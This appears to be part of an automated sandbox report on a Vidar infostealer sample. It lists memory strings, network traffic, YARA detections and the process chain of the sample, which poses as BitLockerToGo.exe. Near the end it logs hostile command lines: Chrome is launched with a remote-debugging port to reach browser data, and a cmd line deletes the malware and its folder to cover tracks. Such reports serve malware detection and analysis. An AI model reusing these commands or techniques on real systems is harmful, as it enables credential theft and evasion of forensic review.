              Source: chrome.exe, 00000005.00000002.2175410420.00006D8C004F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
              Source: chrome.exe, 00000005.00000002.2175410420.00006D8C004F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submitm
              Source: chrome.exe, 00000005.00000002.2179200325.00006D8C00A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
              Source: chrome.exe, 00000005.00000002.2173830012.00006D8C0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
              Source: chromecache_75.7.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
              Source: chromecache_75.7.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
              Source: chrome.exe, 00000005.00000003.2126429989.00006D8C0171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126339639.00006D8C01718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126881847.00006D8C01754000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126543251.00006D8C01724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126651208.00006D8C01730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126606132.00006D8C01728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126485481.00006D8C01720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126726630.00006D8C01738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2126813737.00006D8C0174C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
              Source: chrome.exe, 00000005.00000003.2122260052.00006D8C01498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
              Source: chrome.exe, 00000005.00000002.2174611044.00006D8C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
              Source: chrome.exe, 00000005.00000002.2182274506.00006D8C010FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: chrome.exe, 00000005.00000002.2182274506.00006D8C010FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: chrome.exe, 00000005.00000002.2175410420.00006D8C004F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
              Source: chromecache_70.7.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: chromecache_70.7.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: chromecache_70.7.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: chrome.exe, 00000005.00000003.2121620779.00006D8C01430000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
              Source: chrome.exe, 00000005.00000003.2120615961.00006D8C01370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116187272.00006D8C01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116668758.00006D8C013E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120401527.00006D8C01398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2182783296.00006D8C013A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120573504.00006D8C01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121620779.00006D8C01430000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
              Source: chrome.exe, 00000005.00000003.2120573504.00006D8C01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121620779.00006D8C01430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116538462.00006D8C01414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.XA6cJfY6CcY.2019.O/rt=j/m=q_dnp
              Source: chrome.exe, 00000005.00000003.2120573504.00006D8C01354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121620779.00006D8C01430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116538462.00006D8C01414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.y1YSUixQIjo.L.W.O/m=qmd
              Source: BitLockerToGo.exe, 00000004.00000002.2694047242.00000000062BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: BitLockerToGo.exe, 00000004.00000002.2694047242.00000000062BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: BitLockerToGo.exe, 00000004.00000002.2694047242.00000000062BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000004.00000002.2694047242.00000000062BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000004.00000002.2694047242.00000000062BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
              Source: chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
              Source: chrome.exe, 00000005.00000002.2174798561.00006D8C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2175249159.00006D8C004B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 56089 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56100 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56226 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56062 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56322 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56242
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56286
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56089
              Source: unknownNetwork traffic detected: HTTP traffic on port 56242 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56076 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56322
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 56294 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56053 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56057 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56212 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56202
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56248
              Source: unknownNetwork traffic detected: HTTP traffic on port 56063 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56056
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56057
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56058
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56212
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56256
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56333
              Source: unknownNetwork traffic detected: HTTP traffic on port 56219 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56294
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56053
              Source: unknownNetwork traffic detected: HTTP traffic on port 56056 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56050
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56234 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56219
              Source: unknownNetwork traffic detected: HTTP traffic on port 56286 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56059
              Source: unknownNetwork traffic detected: HTTP traffic on port 56060 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56100
              Source: unknownNetwork traffic detected: HTTP traffic on port 56109 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56301 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56267 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56267
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56062
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56063
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56065
              Source: unknownNetwork traffic detected: HTTP traffic on port 56263 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56263
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56060
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56061
              Source: unknownNetwork traffic detected: HTTP traffic on port 56059 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56202 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56311 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 56277 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 56256 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 56248 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56109
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56065 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56301
              Source: unknownNetwork traffic detected: HTTP traffic on port 56061 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56226
              Source: unknownNetwork traffic detected: HTTP traffic on port 56050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56277
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56234
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56311
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56076
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 56333 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:56311 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,4_2_0040EAB5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,4_2_00405AD3

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9dda000.3.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9f00000.2.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9f20000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000003.1966662723.000000000A178000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00404B3F4_2_00404B3F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004151474_2_00415147
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00417D564_2_00417D56
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040AF7E4_2_0040AF7E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004171E14_2_004171E1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004153AF4_2_004153AF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 0040D84A appears 136 times
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966704279.000000000A152000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1974784316.0000000000CC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameTyping Master 11.exeD" vs SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeBinary or memory string: OriginalFileNameTyping Master 11.exeD" vs SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 4.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9dda000.3.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 4.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9f00000.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9f20000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000003.1966662723.000000000A178000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
              Source: wtjw4e.4.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/33@8/8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040F029 CreateToolhelp32Snapshot,Process32First,StrCmpCA,Process32Next,StrCmpCA,CloseHandle,4_2_0040F029
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\94GQUNS9.htmJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: chrome.exe, 00000005.00000002.2176447902.00006D8C00771000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
              Source: BitLockerToGo.exe, 00000004.00000003.2194159423.00000000059A3000.00000004.00000020.00020000.00000000.sdmp, mozcb1d2n.4.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeReversingLabs: Detection: 39%
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeVirustotal: Detection: 45%
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeString found in binary or memory: GOMAXPROCSGOMEMLIMITGetIfEntryGetVersionGlagoliticHTTP_PROXYHumpEqual;IP addressISO 8859-1ISO 8859-2ISO 8859-3ISO 8859-4ISO 8859-5ISO 8859-6ISO 8859-7ISO 8859-8ISO 8859-9ImportListIsValidSidKeep-AliveKharoshthiLeftArrow;LeftFloor;Leftarrow;LessTilde;LoadConfigLocalAllocLockFileExManichaeanMellintrf;Message-IdMethodImplMethodSpecMinusPlus;No ContentNotCupCap;NotExists;NotSubset;Old_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathOverBrace;POSTALCODEParseFloatPhoenicianPlusMinus;ProcessingPulseEventRIPEMD-160RST_STREAMRelocationResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSet-CookieTherefore;ThinSpace;TripleDot;UnionPlus;User-AgentVC FeatureVarBstrCatVarBstrCmpVarCyCmpR8VarCyMulI4VarCyMulI8VarCyRoundVarR4CmpR8VarR8RoundWSACleanupWSAConnectWSASocketAWSASocketWWSAStartup[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]atomicand8audio/aiffaudio/midiaudio/mpegaudio/wavebackprime;backsimeq;big5-hkscsbigotimes;blockquotecenterdot;checkmark;complex128complexes;csshiftjisdebug calldnsapi.dlldotsquare;downarrow;dwmapi.dllexecerrdotexitThreadexp masterfigcaptionfloat32nanfloat64nanfont/woff2gb_2312-80getsockoptgoroutine gtrapprox;gtreqless;gvertneqq;heartsuit;http_proxyhz-gb-2312image/avifimage/jpegimage/webpimage: Newimpossibleinvalid IPinvalidptriso-8859-1iso-8859-2iso-8859-3iso-8859-4iso-8859-5iso-8859-6iso-8859-7iso-8859-8iso-8859-9iso-ir-100iso-ir-101iso-ir-109iso-ir-110iso-ir-126iso-ir-127iso-ir-138iso-ir-144iso-ir-148iso-ir-149iso-ir-157iso8859-10iso8859-11iso8859-13iso8859-14iso8859-15iso_8859-1iso_8859-2iso_8859-3iso_8859-4iso_8859-5iso_8859-6iso_8859-7iso_8859-8iso_8859-9keep-alivekeySplineskeysplinesleftarrow;lesseqgtr;local-addrlvertneqq;mSpanInUsemyhostnamengeqslant;nleqslant;notifyListnparallel;nrpostgresnshortmid;nsubseteq;nsupseteq;numOctavesnumoctavesowner diedpathLengthpathlengthpitchfork;profInsertrationals;res binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquireset-cookiesetsockoptskipping: spadesuit;stackLargesubseteqq;subsetneq;supseteqq;supsetneq;t.Kind == terminatedtext/plaintextLengthtextlengththerefore;time.Date(time.Localtracefree(tracegc()
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeString found in binary or memory: net/addrselect.go
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeString found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2288,i,14542950946606832466,4016932128899336426,262144 /prefetch:8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\srq9h" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
